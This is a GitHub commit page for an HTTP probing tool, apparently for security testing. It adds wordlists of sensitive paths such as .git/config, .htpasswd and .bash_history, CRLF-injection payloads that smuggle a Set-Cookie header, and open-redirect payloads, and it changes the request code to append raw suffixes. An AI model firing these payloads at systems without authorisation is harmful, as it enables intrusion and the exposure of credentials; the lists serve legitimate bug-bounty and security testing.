Skip to content

Commit

Permalink
Adds lists, disables Opaque suffix
Browse files Browse the repository at this point in the history
  • Loading branch information
@tomnomnom
tomnomnom committed Aug 14, 2017
1 parent a6c451e commit 49b2c74
Show file tree
Hide file tree
Showing 4 changed files with 75 additions and 48 deletions.
98 changes: 52 additions & 46 deletions lists/configfiles
View file
Original file line number Diff line number Diff line change
@@ -1,60 +1,66 @@
/phpunix.xml
/php.php
/phpinfo.php
/phptest.php
/test.php
/README.mkd
/README.txt
/README.md
/README.html
/README
/readme.mkd
/readme.txt
/readme.md
/readme.html
/readme
/.babelrc
/.bash_history
/.bashrc
/build.xml
/Makefile
/circle.yml
/composer.json
/composer.lock
/CVS/Entries
/CVS/Root
/Dockerfile
/.dockerignore
/.editorconfig
/.git/config
/.git/HEAD
/.gitignore
/Gulpfile
/Gruntfile.js
/gruntfile.coffee
/Gruntfile.coffee
/gruntfile.js
/gruntfile.coffee
/phpunix.xml
/php.php
/phpinfo.php
/phptest.php
/test.php
/LICENSE
/LICENSE.md
/LICENSE.txt
/Gruntfile.js
/Gulpfile
/gulpfile.js
/Gulpfile.js
/.hg
/.htaccess
/.htpasswd
/Jenkinsfile
/.jestrc
/license
/LICENSE
/license.md
/LICENSE.md
/license.txt
/.bash_history
/.bashrc
/LICENSE.txt
/Makefile
/mkdocs.yml
/npm-debug.log
/.npmignore
/npm-shrinkwrap.json
/package.json
/phpinfo.php
/php.php
/phptest.php
/phpunit.xml
/.profile
/.git/config
/.git/HEAD
/.svn/entries
/readme
/README
/readme.html
/README.html
/readme.md
/README.md
/readme.mkd
/README.mkd
/readme.txt
/README.txt
/robots.txt
/webpack.config.js
/yarn.lock
/.travis.yml
/.svn/entries
/.swp
/tags
/test.php
/Thumbs.db
/npm-debug.log
/.travis.yml
/tsconfig.json
/webpack.config.js
/yarn-debug.log
/yarn-error.log
/npm-shrinkwrap.json
/Dockerfile
/tags
/.babelrc
/.npmignore
/.jestrc
/.hg
/.swp
/CVS/Root
/CVS/Entries
/yarn.lock
9 changes: 9 additions & 0 deletions lists/crlfinjection
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
/%0aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%%0a0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection
12 changes: 12 additions & 0 deletions lists/openredirects
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
/http://example.com
/%5cexample.com
/%2f%2fexample.com
/http:/example.com
/?url=http://example.com&next=http://example.com&redirect=http://example.com
/?url=//example.com&next=//example.com&redirect=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/.example.com
///\;@example.com
4 changes: 2 additions & 2 deletions req.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -23,7 +23,7 @@ var httpClient = &http.Client{

func httpRequest(method, prefix, suffix string) (response, error) {

req, err := http.NewRequest(method, prefix, nil)
req, err := http.NewRequest(method, prefix+suffix, nil)
if err != nil {
return response{}, err
}
Expand All @@ -32,7 +32,7 @@ func httpRequest(method, prefix, suffix string) (response, error) {
// Because we sometimes want to send some fairly dodgy paths,
// like /%%0a0afoo for example, we need to set the path on
// req.URL's Opaque field where it won't be parsed or encoded
req.URL.Opaque = suffix
//req.URL.Opaque = suffix

// It feels super nasty doing this, but some sites act differently
// when they don't recognise the user agent. E.g. some will just
Expand Down

0 comments on commit 49b2c74

Please sign in to comment.